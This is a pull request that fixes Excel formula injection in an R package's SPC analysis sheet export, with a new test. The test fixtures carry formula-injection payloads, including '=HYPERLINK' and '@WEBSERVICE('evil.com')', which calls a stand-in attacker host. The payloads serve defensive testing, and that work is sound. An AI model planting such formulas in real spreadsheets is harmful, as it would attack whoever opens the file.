### PR TITLE
fix(security): sanitize SPC-analyse-sheet mod Excel formula injection (fixes #484)

### DIFF
--- a/R/fct_spc_file_save_load.R
+++ b/R/fct_spc_file_save_load.R
@@ -141,6 +141,11 @@ build_spc_excel <- function(data,
 
 # Skriv sektioner til "SPC-analyse"-ark med blank-raekker imellem.
 # Hver sektion faar sin egen header-raekke med sektionsnavn.
+#
+# Bruger-kontrolleret data (chart_title, department, baseline_analysis,
+# kommentar-kolonner, m.fl.) sanitiseres via sanitize_csv_output() inden
+# writeData() \u2014 saerlig vigtigt da SPC-analyse-arket aggregeret har bredere
+# user-input-overflade end Data/Indstillinger-arkene (#484).
 .write_spc_analysis_sheet <- function(wb, sections) {
   sheet_name <- SPC_ANALYSIS_SHEET_NAME
   openxlsx::addWorksheet(wb, sheet_name)
@@ -156,7 +161,7 @@ build_spc_excel <- function(data,
     if (nrow(df) > 0L) {
       openxlsx::writeData(wb,
         sheet = sheet_name,
-        x = df, startRow = current_row, rowNames = FALSE
+        x = sanitize_csv_output(df), startRow = current_row, rowNames = FALSE
       )
       current_row <<- current_row + nrow(df) + 1L
     } else {
@@ -184,7 +189,8 @@ build_spc_excel <- function(data,
   if (nrow(sections$special_cause) > 0L) {
     openxlsx::writeData(wb,
       sheet = sheet_name,
-      x = sections$special_cause, startRow = current_row, rowNames = FALSE
+      x = sanitize_csv_output(sections$special_cause),
+      startRow = current_row, rowNames = FALSE
     )
   } else {
     openxlsx::writeData(wb,

--- a/tests/testthat/test-csv-formula-injection.R
+++ b/tests/testthat/test-csv-formula-injection.R
@@ -113,3 +113,70 @@ test_that("sanitize_csv_output() fejler på non-data.frame input", {
   expect_error(biSPCharts:::sanitize_csv_output("ikke en data.frame"))
   expect_error(biSPCharts:::sanitize_csv_output(c("a", "b")))
 })
+
+# Integration-tests for #484: SPC-analyse-arket sanitiseres. Tidligere skrev
+# .write_spc_analysis_sheet() raa user-input direkte via openxlsx::writeData,
+# mens Data- og Indstillinger-arkene allerede kaldte sanitize_csv_output.
+test_that("SPC-analyse-arket sanitiserer kommentar-vaerdier mod formula injection (#484)", {
+  skip_if_not_installed("openxlsx")
+  skip_if_not_installed("readxl")
+  skip_if(
+    !exists(".write_spc_analysis_sheet",
+      where = asNamespace("biSPCharts"), mode = "function"
+    ),
+    ".write_spc_analysis_sheet ikke tilgængelig"
+  )
+
+  sections <- list(
+    overview = data.frame(
+      felt = c("chart_title", "department"),
+      vaerdi = c("=HYPERLINK(\"http://x\", \"klik\")", "+1234"),
+      stringsAsFactors = FALSE
+    ),
+    per_part = data.frame(
+      part = "1",
+      kommentar = "@WEBSERVICE('evil.com')",
+      stringsAsFactors = FALSE
+    ),
+    anhoej = data.frame(
+      part = "1",
+      regel = "-1234 (negativ)",
+      stringsAsFactors = FALSE
+    ),
+    special_cause = data.frame(
+      x = "2024-01-01",
+      kommentar = "=SUM(A1:A10)",
+      stringsAsFactors = FALSE
+    )
+  )
+
+  tmp <- tempfile(fileext = ".xlsx")
+  on.exit(unlink(tmp), add = TRUE)
+  wb <- openxlsx::createWorkbook()
+  biSPCharts:::.write_spc_analysis_sheet(wb, sections)
+  openxlsx::saveWorkbook(wb, tmp, overwrite = TRUE)
+
+  raw <- readxl::read_excel(tmp,
+    sheet = biSPCharts:::SPC_ANALYSIS_SHEET_NAME,
+    col_names = FALSE,
+    col_types = "text"
+  )
+
+  cells <- unlist(raw, use.names = FALSE)
+  cells <- cells[!is.na(cells)]
+
+  # Ingen raa formel-prefixed-tekst i output
+  expect_false(any(grepl("^=HYPERLINK", cells)))
+  expect_false(any(grepl("^\\+1234$", cells)))
+  expect_false(any(grepl("^@WEBSERVICE", cells)))
+  expect_false(any(grepl("^=SUM\\(", cells)))
+  # Sektion B har "-1234 (negativ)" i regel-kolonnen — bekraeft escaped
+  expect_false(any(grepl("^-1234 ", cells)))
+
+  # Sanitize-prefix ' tilstede paa hver injection-vector
+  expect_true(any(grepl("^'=HYPERLINK", cells)))
+  expect_true(any(grepl("^'\\+1234$", cells)))
+  expect_true(any(grepl("^'@WEBSERVICE", cells)))
+  expect_true(any(grepl("^'=SUM\\(", cells)))
+  expect_true(any(grepl("^'-1234 ", cells)))
+})


### PR DESCRIPTION
## Problem

\`R/fct_spc_file_save_load.R::.write_spc_analysis_sheet()\` skrev raa user-input direkte via \`openxlsx::writeData()\`. Data-arket (linje 50) og Indstillinger-arket (linje 91) kalder allerede \`sanitize_csv_output()\` — SPC-analyse-arket var asymmetrisk usaniteret.

User-controlled fields gik direkte til Excel: \`chart_title\`, \`department\`, \`baseline_analysis\`, \`signal_examples\`, \`target_text\`, samt Kommentar-kolonner i overview/per_part/anhoej/special_cause-sektioner.

## Risiko

\`=HYPERLINK(\"http://x\", \"klik\")\` i Kommentar → raa formel skrives → kollega aabner xlsx → eksekveres. Klassisk Excel-formula-injection (CVE-pattern). Selvom appen primaert er inhouse, lukker fix asymmetri konsistent.

## Fix

Wrap \`sections$overview/per_part/anhoej/special_cause\` med \`sanitize_csv_output()\` inden \`writeData()\`. Header-strenge (sektionsnavne, \"Ingen data\"-fallbacks) er kontrolleret af kode — ej behov for sanitering.

## Tests

Ny integration-test i \`tests/testthat/test-csv-formula-injection.R\`: verificerer at 4 formula-injection-vektorer (\`=\`, \`+\`, \`-\`, \`@\`) escapes per sektion via roundtrip openxlsx-write → readxl-read.

- 318 csv+excel+save-load tests passerer (0 FAIL)
- Pre-push gate passerer

Fixes #484